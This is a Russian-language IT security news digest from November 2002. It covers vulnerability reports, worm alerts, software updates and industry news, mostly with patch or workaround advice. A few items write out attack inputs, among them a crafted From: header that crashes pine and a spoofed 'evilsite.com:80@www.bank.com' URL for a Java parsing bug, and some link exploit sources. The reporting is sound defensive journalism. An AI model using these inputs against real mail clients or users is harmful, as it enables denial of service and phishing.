Joshua Wright из Johnson & Wales University опубликовал статью под названием "Layer 2 Analysis of WLAN Discovery Applications for Intrusion Detection". В ней автор описывает работу приложений, предназначенных для исследования и дальнейшего проникновения в беспроводные сети (802.11), наибольшее распространение среди которых получили NetStumbler, DStumbler и Wellenreiter. Статья рассматривает тактику применения этих приложений злоумышленниками, а также систематизирует "отпечатки" (fingerprints), которые могут оставлять во время работы эти инструменты проникновения. Из всех уровней модели OSI рассматриваются 2 подуровня уровня канала данных- MAC (уровень управления доступом к среде передачи) - стандарт IEEE 802.2 и LLC (уровень управления логическим каналом) - cтандарт IEEE 802.3 для протокола CSMA/CD. Приведённые данные могут быть использованы разработчиками инструментов опреления вторжения (IDS) для определения попыток проникновения на основании анализа траффика на 2 уровне сетевой модели ISO - уровне канала данных (Data link layer). Статья доступна в формате PDF. Ccылка - http://home.jwu.edu/jwright/papers/l2-wlan-ids.pdf
13/11/2002 10:01 Вышло второе обновление для MacOS 10.2 Jaguar.
Компания Apple выпустила очередное обновление для операционной системы MacOS X 10.2 Jaguar. После его установки номер версии ОС меняется на 10.2.2. В обновлении исправлены различные ошибки и недоработки в самой ОС и некоторых прикладных программах, а также добавлена поддержка ряда новых устройств от сторонних производителей. В частности, в MacOS 10.2.2 улучшено воспроизведение больших мультимедийных файлов, исправлена редко возникающая ошибка, не позволявшая извлечь из CD- или DVD-привода неправильно вставленный туда диск. Улучшена совместимость ОС с принтером HP LaserJet 4MV при печати через локальную сеть и добавлена поддержка новых записывающих CD-приводов фирм aCie, Sony, Toshiba, Pioneer и Yamaha. В самой ОС ликвидированы несколько проблем с безопасностью и стабильностью. Среди них возможность сбоя ядра ОС при установке в компьютер трех видеокарт и более 512 Мб оперативной памяти, устранена возможность несанкционированного доступа в систему удаленных из нее пользователей. Несколько улучшена совместимость ОС с пакетами Microsoft PowerPoint и Adobe Acrobat Reader, а также устранет ряд проблем со встроенными приложениями Аddress Book, iChat, IP Firewall, Mail, Print Center, Rendezvous и Sherlock. Обновление также включает в себя сентябрьский патч к системе безопасности ОС. Cкачать обновление (24,4 МБ) - http://www.info.apple.com/support/downloads.html
13/11/2002 9:52 Oracle и Co. облегчат жизнь администраторам БД.
На проходящей на этой неделе в Сан-Франциско конференции OracleWorld корпорации Oracle, Expand Beyond, DataMirror и Quest Software представили новые инструменты, призванные помочь администраторам баз данных в управлении СУБД. Задавала тон мероприятия компания Oracle, продемонстрировавшая редакцию Enterprise Manager 4.0, управляющего ПО для БД, которое обеспечивает полный системный обзор через консоль, построенную на основе HTML. Эта консоль позволяет администратору отслеживать и управлять уровнями производительности каждого компонента инфраструктуры, что затронет умения конечных пользователей, от загрузки ссылки до работы на своей настольной системе. Одной из целей новой редакции является лучшее информирование администратора БД о состоянии корпоративных приложений и снижение числа запросов конечных пользователей к системе помощи. По мнению представителей Oracle, это поможет выяснить реальный уровень подготовки конечных пользователей. Источник - http://www.cnews.ru/news/comp/2002/11/12/20021112180000.shtml
12/11/2002 22:23 Новый способ передачи скрытых сообщений.
Довольно любопытная статья Майкла Канеллоса (Michael Kanellos). Чего только не изобрели люди для тайной передачи информации! Секретные коды, 128-битное шифрование, машину Enigma, невидимые чернила, красные и синие целлофановые накладки... Человечество с самой колыбели цивилизации ищет способ отправлять конфиденциальные сообщения. Intrasonics, молодая компания из Кембриджа (Англия), утверждает, что такие сообщения можно передавать через обычные динамики. Бывшее подразделение консалтинговой фирмы и инкубатора молодых компаний Generics Group предложило способ передачи сигналов беспроводной связи через стандартные громкоговорители таким образом, что человеческое ухо их не услышит. Такая технология позволит радиостанциям ненавязчиво передавать рекламу, адреса веб-сайтов или информацию о музыке и исполнителях на бортовые сотовые телефоны автомобилей. В ближайшие полгода крупный международный оператор связи начнет испытания подобной системы. Ссылка- http://www.zdnet.ru/?ID=291149
12/11/2002 22:05 Пойман британец, взламывавший американские военные сайты.
Спецслужбы США вычислили хакера, который в течение последнего года проник в сети примерно ста американских военных организаций, в числе которых Пентагон и Арсенал Пикатини (Picatiny Arsenal) в штате Нью-Джерси. По имеющимся на настоящее время данным, ни одна из взломанных сетей не содержала секретной иннформации. Личность хакера держится в тайне, известно лишь, что он является подданным Великобритании. Вполне вероятно, что уже на этой неделе дело хакера поступит на рассмотрение американского суда. Пока не известно, планируют ли США требовать от Великобритании выдачи хакера. Как правило подобные дела рассматриваются на родине обвиняемых, однако данный конкретный случай может стать исключением. Дело в том, что расследование взломов военных сайтов было одним из главных направлений работы разведок Армии и ВМФ США. Кроме этого, анонимные источники агентства Associated Press, близкие к следователям, утверждают, что хакер, по всей видимости, является профессионалом. Любителю просто не под силу взломать такое большое количество сетей, считают эксперты. По этим причинам вероятность того, что американские власти захотят судить хакера на своей территории достаточно велика. Кроме этого, и США и Великобритания сейчас активно борются с киберпреступностью, в целях чего подписали соответствующую конвенцию Совета Европы. Британские власти пока отказываются от комментариев по данному вопросу Подробности - http://www.cnn.com/2002/US/...
12/11/2002 13:10 Cтатья "Написание эксплоитов переполнения буфера. Руководство для начинающих".
Михаил Разумов на сайте www.securitylab.ru порадовал очередным переводом статьи с www.securiteam.com. Как указано в предисловии "Эта статья позволит среднему программисту на С научиться использовать эти уязвимости". Так что читаем, набираемся ума-разума. :) Ccылка - http://www.securitylab.ru/?ID=34179
12/11/2002 12:36 Обновление документации на linux.org.ru.
На сайте linux.org.ru выложены первые три главы перевода книги Using Samba. Ссылка - http://www.linux.org.ru/books/using-samba/
12/11/2002 11:57 Антивирус Касперского удостоен очередной награды Virus Bulletin 100%.
Британский журнал Virus Bulletin, специализирующийся на проблемах компьютерной вирусологии, в своем ноябрьском номере опубликовал результаты регулярного сравнительного тестирования антивирусных продуктов. На этот раз тестировались антивирусные решения на платформе Windows. Антивирус Касперского показал 100% результат в обнаружении вирусов, не допустив при этом ни одного ложного срабатывания. По итогам тестов продукт "Лаборатории Касперского" в очередной раз был награжден значком "VB 100%". Источник - http://www.avp.ru
12/11/2002 10:56 Полиморфные макро-вирусы.
Вышла 2-ая часть статьи на securityfocus.com, посвященной обзору полиморфных макровирусов. Статья описывает основные принципы их работы, а так же повествует об особенностях конкретных "особей". Ознакомиться - http://online.securityfocus.com/infocus/1638
12/11/2002 10:55 Очередная утечка из Microsoft: Бороться с Linux не получается
На сайте Open Source Initiative и прежде публиковались различные "утечки", причем подлинность первых двух писем, появившихся еще в 1998 году, была официально подтверждена представителями Microsoft. Но сомнения в подлинности последней информации есть: слишком уж сильно в этом сообщении Microsoft раскаивается в своих "грехах" по отношению к свободному ПО. В новом письме утверждается, что методы, использующиеся компанией для борьбы с открытым программным обеспечением, признаны неэффективными. Наиболее бесполезной тактикой автор документа считает споры о юридическом статусе открытого софта и резкую критику такового в выступлениях руководства (например, однажды представитель компании назвал движение open-source "раковой опухолью"). В Microsoft, если верить в подлинность письма, постепенно приходят к выводу, что рассказывать "сказки" об открытом программном обеспечении (к таковым можно отнести критику открытого софта, статьи о том, как сложно и дорого использовать такое программное обеспечение), не только не помогает, но и даже вредит. Подробнее - http://compulenta.ru/2002/11/11/35341/
12/11/2002 10:35 Минсвязи хочет вернуть обязательные разрешения на мобильные телефоны.
Как сообщает РБК, Минсвязи в своем официальном заявлении утверждает, что полностью не согласно с этим решением, но вынуждено его исполнять. Министерство приняло к исполнению определение Кассационной Коллегии Верховного Суда РФ о признании незаконным пункта 7 постановления правительства РФ "Особые условия приобретения радиоэлектронных и высокочастотных средств", и управлениям государственного надзора за связью и информатизацией на места было направлено директивное указание о приостановлении производством всех административных дел о реализации РЭС (радиоэлектронных средств) без разрешения. Однако, руководствуясь 12 статьей закона "О связи", на этот раз уже от 1995 года, министерство намерено реализовывать право правительства устанавливать порядок выделения радиочастот, особые условия разработки, проектирования, строительства, приобретения, эксплуатации и ввоза из-за границы радиоэлектронных средств и высокочастотных устройств, а также определять комплекс мер по защите радиоприема от индустриальных радиопомех. В совокупность этих мер входит и реализация средств связи и устройств. Источник - http://www.cnews.ru
11/11/2002 13:43 С помощью браузера Ghostzilla можно бродить по интернету тайком от начальства.
У любителей побродить по интернету в рабочее время появился новый способ избежать излишних трений с начальством. С помощью нового браузера Ghostzilla это можно делать совершенно незаметно. Как видно из названия, новинка является очередной модификацией знаменитого браузера Mozilla. Ключевой особенностью Ghostzilla является умение маскировать окно браузера под окна других приложений. В результате, нерадивые сотрудники получают возможность в свое удовольствие гулять по интернету, создавая полную иллюзию плодотворной работы. Для вызова браузера необходимо два раза провести курсором мыши от левого края экрана к правому и обратно. После этого в окне предварительно запущенного приложения, например, текстового редактора или среды разработки, появляется интерфейс браузера с собственным меню и областью для отображения веб-страниц. Подробности - http://www.compulenta.ru/2002/11/10/35313/
11/11/2002 13:10 Сетевая цензура введена в Южной Австралии.
Обе палаты парламента Южной Австралии приняли закон о цензуре в интернете. За принятие голосовали либералы и партия лейбористов, а демократы были против. Среди прочего, законопроект, который скоро станет законом, делает уголовным преступлением размещение в Сети "взрослых" материалов, даже если они недоступны детям. Таким образом, если материалы класса "R" будут размещены даже на сайте с паролем, который будет выдаваться только взрослым, владельца сайта могут оштрафовать через уголовный суд на сумму до $10 тысяч. Речь идет не только о порнографических и эротических изображениях, но и текстовых сообщениях, отправляемых на форумы, группы новостей usenet и т.д. Источник - http://www.cnews.ru
10/11/2002 22:16 Создание backup в Linux.
Новая статья на LinuxJournal.com повествует о некоторый малоизвестных идеях, применяемых при создании backup в Linux. Ознакомиться - http://www.linuxjournal.com/article.php?sid=6435&mode=thread&order=0
10/11/2002 22:10 Уязвимость в kerberos.
Пакет kerberos версий до v4 подвержен удаленному переполнению буфера. Для нарушения работоспособности системы, злоумышленнику даже не требуется проходить аутентификацию на сервере. Обновленные версии ПО уже доступны на сайте Red Hat. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-11-07-019-26-SC-RH
10/11/2002 14:12 Технические подробности MS Java-уязвимостей.
Jouko Pynnonen в письме в BUGTRAQ, после безуспешных попыток добиться от Microsoft устранения ошибок, обнаруженных им в реализации Java в ОС Windows и в IE в частности, решил подробно описать обнаруженные им уязвимости в MS Java. Из опубликованных в августе 10 уязвимостей производитель (M$) устранил только 4 (патч MS-02-52). Автор указывает, что для практической реализации обнаруженных уязвимостей необходимо достаточно глубокое знание Java, поскольку в письме описываются только общие принципы. Итак, если вкратце перечислить уязвимости, они выглядят так: 1. Ошибка разбора URL (неверный разбор URL, содржащий двоеточие для обозначения порта. URL http://www.evilsite.com:80@www.bank.com/bankapplet.html соединит броузер с сайтом www.bank.com). 2. Переполнение буфера в загрузчике классов (DoS). 3. Раскрытие местонахождения файла (full path disclosure). 4. Доступ к памяти INativeService (чтение произвольной области памяти с возможностью записи произвольного кода с последующим выполнением). 5. Доступ к буферу (clipboard) INativeServices (любой апплет может получить и изменить содержимое буфера). 6. При расшаривании ресурсов возможность получения доступа через file:// 7. Возможность обхода ограничений на StandardSecurityManager. 8. Доступ к классу com.ms.vm.loader.CabCracker (апплет может получить доступ к любому локальному .cab-архиву. 9. Проблемы с HTML-объектом, передаваемом Java-апплету через JavaScript. 10. HTML <applet> может быть использован для обхода ограничений доступа к классам Java. В качестве защиты автор советует отключить поддержку Java (Internet Options -> Security -> Internet -> Custom level -> Microsoft VM/Java permissions / Disable Java), либо использовать другие Вэб-броузеры и почтовые клиенты. Более подробное описание можно посмотреть на сайте security.nnov.ru. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3730
10/11/2002 12:42 Локальная уязвимость в Neutrino RTOS.
iDEFENSE, Inc. обнаружена уязвимость в Neutrino RTOS - ОС реального времени (real time OS), выпускаемой QNX Software Systems Ltd. ОС применяется во встроенных (embedded) системах: cетевые маршрутизаторы, медицинское оборудование, интеллектуальные транспортные системы, системы безопасности, коммуникационное оборудование и т.д. В своём оборудовании эту ОС используют такие широкоизвестные фирмы, как Cisco, Delphi, Siemens, Alcatel, Texaco. Уязвимость связана с тем, что приложение packager установлено с установленным битом полномочий SUID (изменение полномочий текущего пользователя на время выполнения программы до полномочий пользователя-хозяина (owner) программы - зачастую root). Кроме того, при запуске packager он не проверяет полного пути запускаемой программы, что позволяет провести атаку типа symlink и получить в системе полномочия суперпользователя. Уязвимость обнаружена в QNX Neutrino RTOS 6.2.0. В качестве временной меры предлагается выполнить команду chmod -s 'which packager', а также обновиться до ОС версии 6.2.1, которая была выпущена в январе 2002 г. В самом сообщении iDEFENSE, Inc. приводит сценарий использования уязвимости. Подробности - http://www.idefense.com/advisory/11.08.02b.txt
10/11/2002 12:28 Уязвимость в IRIX.
В бюллетене по безопасности 20021103-01-P, выпущенном SGI, сообщается об обнаружении уязвимости в библиотеке libc в участке кода, отвечающем за обработку запросов Sun RPC (Remote Procedure Call - вызов удалённых процедур). Из-за некорректной обработки тайм-аутов при чтении данных из TCP-соединений возможно проведение удалённой атаки типа DoS. Уязвимость получила в системе номерации багов IRIX номера 852333 и 871325. Устраняется либо обновлением ОС до IRIX 6.5.18, либо применением патчей 4838, 4839, 4842, 4843, 4840, 4845, 4841, 4846 (в зависимости от версии ОС IRIX). Источник - http://www.sgi.com/support/security/
10/11/2002 12:15 Уязвимость в QNX 6.1.
Pawel Pisarczyk обнаружил локальную уязвимость в операционной системе QNX 6.1. При создании определённого количества таймеров (не менее 2-х) с временем "тиков" (tick) 1 ms система повиснет. Выпущен экплоит. Исходник эксплоита - http://www.security.nnov.ru/files/timer-exploit.c
10/11/2002 11:55 Уязвимость в Cisco PIX SSH/telnet.
Nils Reichen из французской фирмы LANexpert обнаружил уязвимость в файрволлах Cisco PIX. Заключается она в неверной обработке TCP/IP стеком PIX OS 6.2.2 запросов к сервисам SSH и Telnet. При посылке внешним атакующим SYN-пакета с адресом подсети (subnet) в качестве Destination_address память, выделяемая сетевым стеком не освобождается. Таким образом, сформировав определённое количество запросов (либо применив атаку типа DDoS) можно полностью исчерпать память CISCO PIX-файрволла. Тестирование проводилось на PIX 515 с PIX OS 6.2.2 с использованием инструмента Naptha tool v1.1 от BindView's RAZOR Security Team. В качестве меры противодействия рекомендуется фильтровать запросы к SSH/Telnet На внешнем файрволле. Производителем назначен идентификатор бага - CSCdy51810, а также выпущена новая патченная версия ОС - 6.2.2.111. Подробности - http://www.giac.org/GCIA.php
10/11/2002 11:38 Ошибка в программе выдала немецкие спецслужбы.
Случайный сбой, происшедший в работе программного обеспечения немецкого подразделения европейского сотового оператора O2, позволяет предположить, что его абоненты прослушиваются спецслужбами. Все началось с того, что некоторые абоненты обнаружили в своих телефонных счетах оплату разговоров с совершенно незнакомым им номером (за них, естественно, взымалась плата согласно тарифу). Если позвонить по этому номеру, трубку снимает автоответчик и объявляет, что на этот телефонный номер звонить нельзя. Как удалось выяснить позже, телефон принадлежит Секретной службе ФРГ. Первое и самое очевидное объяснение странностей со счетами, которое тут же приходит в голову - это, конечно, прослушивание телефона. Никакие более достоверные объяснения случившемуся так и не появились. Между тем, представители O2 заявили, что неполадка, из-за которой произошел инцидент, уже исправлена. Источник - http://www.theregister.co.uk/
10/11/2002 11:15 В Санкт-Петербурге пройдет конференция по информационной безопасности предприятий.
13 ноября 2002 года компания "Поликом Про" совместно с представительствами компаний Microsoft, Intel, Cisco Systems, APC и ЗАО "Прикладная Логистика" (эксклюзивный дистрибьютор TrendMicro в России) проводят в Международном Центре Делового Сотрудничества вторую региональную конференцию "Информационная безопасность современного предприятия". В докладах участников будет рассматриваться комплекс вопросов информационной безопасности современного предприятия - от методических аспектов до технологий и комплексных решений. Конференция будет проходить с 09:30 до 15:40 в среду, 13 ноября в Санкт-Петербурге, Международный Центр Делового Сотрудничества: пл. Пролетарской диктатуры, 6 (ст. метро "пл. Восстания", "Маяковская", "Чернышевская"). Источник информации - CNews.ru. Регистрация - http://www.polikom.ru/seminar
10/11/2002 1:7 Новая программа в разделе проектов: Process Killer v1.0
Маленькая программка, которая умеет управлять процессами (запускать, удалять и просматривать список). Умеет убивать любые процессы, даже системные. Исходники прилагаются. Скачать здесь: http://www.uinc.ru/scripts/load.cgi?files/bullet/process_killer.zip
9/11/2002 22:37 Возможность выполнения команд в IE с произвольными параметрами.
Вышла довольно интересная статья Андреаса Сандблада из Швеции о возможности выполнения команд с параметрами в IE. Довольно сложно было перевести и изложить в нескольких строках предлагаемаю им технологию. Поэтому снимаю шляпу перед коллегами из Securitylab.ru, перевёвшими почти полностью статью Сандблада. Позволю себе только дополнить перевод ссылкой на пример, демонстрирующей описанную уязвимость и выложенной в Интернет WeHack4You CyberStalking Consultancy. Вкратце суть технологии можно описать так (ссылаюсь к Securitylab). По умолчанию, все Web страницы, загружаемые через Internet, отображаются в браузере с ограничениями "Internet zone". Локальные страницы будут отображены в IE с привилегиями "Local computer zone", которые имеют намного меньше ограничений. За последний год обнаружено несколько десятков уязвимостей, которые позволяют Web страницам или почтовым HTML сообщениям обходить существующие ограничения и получать доступ к возможностям "Local computer zone". Такие сценарии могут выполнять опасные действия: читать локальные файлы, если известен точный путь к ним и если они могут быть открыты IE, выполнять локальные программы (требуется знать точный путь к программе) БЕЗ параметров. Sandblad опубликовал методику, в которой описывается как сценарии в "Local computer zone" могут выполнять произвольные программы с параметрами, даже не зная точного местоположения программы. Используя эту методику, атакующий может выполнять более разнообразные и опасные нападения против уязвимой системы (например, отформатировать диск). Подробности - http://www.securitylab.ru/?ID=34092 Довольно безобидная демонстрация - http://www.why4.com/hack.html
9/11/2002 22:00 Cтатья "Установка Apache 2.0 в Windows 2000".
Dan DiNicolo в статье "A Viable IIS Alternative? Apache 2.0 on Windows 2000" рассматривает этапы установки популярного (и более защищённого) Вэб-сервера Apache 2.0 в операционной системе Windows 2000. Подробности - http://www.serverwatch.com/tutorials/article.php/1474251
9/11/2002 20:51 Уязвимость в NetBSD.
NetBSD Foundation, Inc. выпущен бюллетень по безопасности Security Advisory 2002-024, в котором указывается, что модуль FTP proxy пакета IPFilter содержит уязвимость. В результате некорректной обработки состояния FTP-команд и ответов на них "внешний" злоумышленник может получить возможность установить соединение с FTP-cерверами или клиентами за файрволлом (внутри защищаемой сети), в котором обнаружена уязвимость. Уязвим пакет IPFilter до версии 3.4.29. Необходимо отметить, что в NetBSD По умолчанию не устанавливается IPFilter c модулем FTP proxy, таким образом, сама установка по умолчанию не подвержена уязвимости. До обновления рекомендуется отключить FTP proxy, убрав или закомментировав строки, включающие "proxy" и "ftp/" в файле /etc/ipnat.conf. Уязвимость обнаружена в версиях NetBSD-current (до 20.09), NetBSD-1.5 (1.5.1/2/3), NetBSD 1.6. В бюллетене содержаться подробные инструкции о том, как обновить текущие версии ОС и базирующиеся на IPFilter приложения. Обновлённый софт уже помещён в репозитарий CVS. Подробности - ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-024.txt.asc
9/11/2002 18:01 Статья "Конфигурирование Windows 2000: Как заставить работать вместе Apache, PHP, MySQL и phpMyAdmin".
Scott Beatty опубликовал статью, имеющую название "Real-World Windows 2000 Configuration: Getting Apache, PHP, MySQL, and phpMyAdmin to Work Together". Хоть и опубликована она аж 31 июля 2002 г., но, думаем, будет интересна админисраторам серверов Win2K. В качестве альтернативы родного IIS и MsSQL предлагается связка из Вэб-сервера Apache, языка скриптов PHP, СУБД MySQL. Автор рассказывает о собственном опыте установки и конфигурирования на ноутбуке Dell Latitude C800 с установленной ОС Windows 2000 Professional. Использовались версии: Apache 1.3.26 с Mod_SSL 2.8.10, PHP 4.2.2, MySQL 4.0.2-alpha, и phpMyAdmin 2.3.0-rc4. Состоит из двух частей. 1 часть - http://www.serverwatch.com/tutorials/article.php/1437211 2 часть - http://www.serverwatch.com/tutorials/article.php/1441631
9/11/2002 17:38 NetOctave выпустила ПО с поддержкой FreeBSD.
NetOctave, разработчик ПО для SSL и IPsec, анонсировала выход своего ПО Software Development Kit версии 2.3. В этой новой версии включена поддержка Sun Solaris 8, FreeBSD 4.6 and SSH IPSEC Express Toolkit 5.0. До этой версии ПО фирмы поддерживало ОС Red Hat Linux, BSD/OS, и VxWorks, а также приложения с поддержкой SSH IPSEC Express Toolkit 4.2. Software Development Kit представляет собой набор API для поддержания шифрования SSL и IPsec. Источник - http://www.netoctave.com/
9/11/2002 17:10 Выход Mandrake Linux 9.0.
MandrakeSoft вчера анонсировала выход новой боксовой версии выпускаемого этой фирмой дистрибутива Linux - Mandrake Linux 9.0, получившего название Dolphin. Дистрибутив содержит три версии пакетов: Mandrake Linux PowerPack Edition, Standard Edition для индивидуальных пользователей и ProSuite Edition для компаний малого и среднего бизнеса. Новая версия доступна для скачивания с http://www.mandrakestore.com. Подробности - http://www.mandrakesoft.com/company/press/pr?n=/pr/products/2399
9/11/2002 16:41 Выход QT 3.1.0.
Trolltech анонсировала выход новой версии библиотеки для разработки графических приложений QT. Лозунг Trolltech для платформы QT 3 - Windows + Linux + Mac OS = One Platform. Изменений довольно много, основные из них изложены в Changelog. Как указывается коллективом из Норвегии, это в основном багофикс-релиз. Подробности - http://www.trolltech.com/developer/changes/3.0.6.html
9/11/2002 16:00 Изменения в системе корневых DNS-серверов.
Впервые за последние 5 лет были сделаны изменения в системе корневых DNS-серверов. На этот раз изменения коснулись сервера J.ROOT-SERVERS.NET, управляемом фирмой Verisign. Cервер был перемещён как физически (в другое здание), так и логически - в другой участок сети. Серверу был присвоен новый IP-адрес - 192.58.128.30, соответственно были сделаны изменения в файле корневой зоны named.root, новое содержимое которого администраторы DNS-cерверов могут взять с адресов: ftp://rs.internic.net/domain/named.root или ftp://ftp.internic.net/domain/named.root. Новый серийный номер зоны - 2002110501. Компания Verisign управляет 2-мя корневыми DNS-серверами и такое перемещение, по словам представителя компании Cheryl Regan, необходимо для предотвращения возможности выхода из строя одновременно обоих серверов в результате направленной хакерской атаки либо каких-либо сбоев в оборудовании. Источник - http://slashdot.org/articles/02/11/07/1613256.shtml?tid=95
8/11/2002 19:15 Удалённый DoS в pine.
Linus Sjцberg обнаружил возможность проведения удалённой DoS-атаки на MUA (Mail User Agent) pine. Злоумышленник может послать вполне легальное E-mail сообщение со специально сформированным полем From: - при этом при запуске pine упадёт с выдачей core-файла. При этом для нормального запуска pine необходимо либо ручное удаление сообщения с почтового сервера, либо удаление при помощи другого MUA. До удаления сообщения нет никакой возможности получить доступ к разделу INBOX при помощи pine. Заголовок From:, по словам автора, при тестировании выглядел следующим образом: "\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""@host.fubar Тестировалась версия pine 4.44 на Redhat 7.2. Автор также замечает, что после того, как pine упадёт существует возможность выполнения кода на машине жертвы. Производитель pine (Washington University) устранил уязвимость в версии 4.50, однако не предоставил её в публичное использование. Источник - http://www.securityfocus.com/
8/11/2002 18:51 Возможность увидеть "невидимого" пользователя в Yahoo IM.
В BUGTRAQ появилось сообщение, в котором утверждается, что можно установить присутствие в онлайне пользователя Yahoo Instant Messenging ПО при установленной опции "Invisible". В Yahoo IM есть возможность разрешить доступ к локальному диску другим пользователям. При этом, когда к Вашему диску кто-то пробует получить доступ, выводится сообщение о попытке доступа и ожидается подтверждение разрешения. Со стороны запросившего разрешение ("View Shared Files") выводится либо сообщение "Asking for permissions" (пользователь в онлайне), либо "user offline" (если пользователь в оффлайне, независимо от состояния флага "Invisible". Таким вот нехитрым способом можно узнать нахождение пользователя в онлайне. Тестировались версии 5,0,0,1046/3,0,0,423 (вторая цифра -версия MyYahoo Module) и 5,0,0,1232/5,5,0,449. Источник - http://www.securityfocus.com
8/11/2002 18:29 Объединенный Linux к старту готов.
Компания UnitedLinux сообщила на конференции LinuxWorld о завершении бета-тестирования первого выпуска открытой операционной системы Linux и об официальном выпуске этого продукта, который намечен на следующий месяц. Представленная на сайте компании версия была загружена уже более 15 тыс. раз, что свидетельствует о высоком интересе со стороны разработчиков, клиентов и партнеров. Компания сейчас занимается формированием пакета и пока не сообщает ни точной даты выпуска, ни цен. UnitedLinux Version 1.0 разработана четырьмя компаниями - SuSE Linux AG, Caldera International, TurboLinux и Conectiva, пришедшими в мае этого года к соглашению объединить усилия в области разработки и распространять общий продукт. Поддержка продукта, независимо от того, где он работает, а также его обслуживание и модернизации будут предлагаться компанией на платной основе. Альянс четырех компаний достаточно влиятелен, чтобы конкурировать на равных с лидером рынка Linux - компанией Red Hat. В UnitedLinux будут представлены новые функции, в том числе поддержка большего объема памяти. Источник - http://www.osp.ru/news/soft/2002/11/06_01.htm
8/11/2002 18:11 Обнаружена попытка взлома сервера "Лаборатории Касперского".
"Лаборатория Касперского" сообщает, что в ночь с 7 на 8 ноября 2002 г. была произведена хакерская атака на сервер компании. В результате этого действия группе злоумышленников удалось разослать подписчикам электронных новостей "Лаборатории Касперского" письмо, содержащее недавно обнаруженного сетевого червя I-Worm.Bridex. "Bridex" распространяется в письмах электронной почты и может заразить компьютер двумя путями: при ручном запуске вложенного файла README.EXE, автоматически при прочтении письма, в случае, если на компьютере не установлена "заплатка", устраняющая IFRAME-брешь в системе безопасности Internet Explorer. Несмотря на то, что "Лаборатория Касперского" до сих пор не получила сообщений о реальных случаях заражения, пользователям советуют ни в коем случае не открывать письма, имеющие указанные параметры (см. сайт Касперского) и немедленно удалить их. Для укрепления защиты также настоятельно рекомендуем установить "заплатку" для IFRAME-бреши, которая доступна бесплатно на сервере Microsoft. Лаборатория Касперского" также напоминает о правилах безопасности новостной рассылки компании, что позволяет самостоятельно определить авторство доставленного Вам письма. Помните, что сообщения в новостных блоках "Лаборатории Касперского" соответствуют формату plain text и никогда не содержат вложенных файлов. Если на Ваш адрес пришло письмо с вложенным файлом - ни в коем случае не запускайте его и перешлите в службу технической поддержки компании на экспертизу. Подробности и образец письма - http://www.kaspersky.ru/news.html?id=1097133
8/11/2002 17:48 Новая версия Dr.Web для TheBat!.
Выпущена вторая предварительная версия (release candidate 2) подключаемого модуля Dr.Web для проверки почты на вирусы в популярной почтовой программе TheBat! Этот модуль полностью совместим с антивирусной программой Dr.Web версии 4.29. В новой версии исправлены ошибки обработки вложенных архивов, добавлена возможность ведения более полного протокола работы, организован вывод сообщений в случае нахождении вирусов в почтовых файлах. Источник - http://www.drweb.ru
8/11/2002 17:24 MasterCard сделает онлайновые платежи своих клиентов безопасными.
Международная платежная система MasterCard International представила собственное программное решение, способствующее повышению безопасности электронных платежей в интернете, сообщает "Газета.ру". Теперь пользователю MasterCard, пожелавшему воспользоваться данным сервисом при покупке чего-либо в Сети, потребуется ввести особенный пин-код. Новая услуга, продвигаемая под брэндом MasterCard Secure Code, нацелена на обеспечение безопасности интернет-покупателей в онлайне и предоставление гарантий работающим в Сети торговым компаниям. Наличие у карты личного кода безопасности подразумевает новую процедуру идентификации ее владельца в Сети. Как следует из сообщения, процедура распознавания не особенно обременит держателя карты MasterCard Secure Code, поскольку почти не отличается от процесса авторизации при работе с банкоматами. В специальном окне на мониторе ПК перед совершением сделки в режиме онлайн потребуется ввести собственный код (который предварительно выбирается клиентами MasterCard Secure Code посредством интернета или по телефону). Безопасность обработки введенного пароля обеспечивается эмитентом карточки, при этом в торговые компании никакая информация о личных кодах передаваться не будет. При этом риск мошенничества, связанный с несанкционированным использованием номеров кредитных и дебетовых счетов в киберпространстве, как обещает MasterCard, будет сведен к минимуму. Исчтоник - http://www.gazeta.ru/
8/11/2002 16:55 В зоне com.ua отключили более 12 тыс. доменов.
Ранее мы сообщали о предполагаемых планах отключения доменов в зоне com.ua. И вот регистратор доменных имен ALPHA-Registrator объявил о том, что, по данным на утро 4-го ноября 2002 г., в результате окончания срока перерегистрации было отключено более 12 тыс. доменных имен, не прошедших перерегистрацию в соответствии с действующими правилами домена com.ua. Из них более 7 тыс. доменных имен на момент отключения не использовались для адресации каких либо интернет- ресурсов. В течение ближайшей недели предыдущие владельцы доменов, не прошедших вовремя перерегистрацию, еще смогут перерегистрировать свои домены. В дальнейшем все невостребованные и неперерегистрированные домены будут удаляться. Источник - http://www.a-registrator.com.ua/
8/11/2002 16:27 На сайте новая статья: Процессы в Windows.
В этой статье рассмотрены основные моменты многозадачной работы в Win32: создание и завершение процессов, синхронизация и межпроцессное общение. Ознакомиться: http://www.uinc.ru/articles/38/index.shtml
7/11/2002 13:48 Осторожно! Новый сетевой червь!
"Лаборатория Касперского" сообщает об обнаружении нового сетевого червя "Roron", созданного в Болгарии. На данный момент уже обнаружено 6 разновидностей червя, которые вызвали многочисленные заражения во многих регионах, включая Россию, США и ряд европейских стран. Деструктивные процедуры, встроенные backdoor-функции (несанкционированное удаленное управление компьютером), способность к многоканальному распространению - все это позволяют присвоить данному червю высшую категорию опасности. "Roron" распространяется по нескольких каналам передачи данных: через электронную почту в виде прикрепленных файлов, по ресурсам локальных сетей и файлообменной сети KaZaA. Заражение системы происходит, только если пользователь самостоятельно запустит файл-носитель червя, полученный из одного из вышеуказанных источников. В процессе проникновения на компьютер "Roron" создает свои копии в каталогах Windows и Program Files и регистрирует один из этих файлов в ключе авто-запуска системного реестра. Таким образом, червь обеспечивает свою активизацию при каждом запуске операционной системы. Подробное описание - http://www.kaspersky.ru/news.html?id=1096738
7/11/2002 13:30 Сообщения о наличии вируса для мобильников лишены основания.
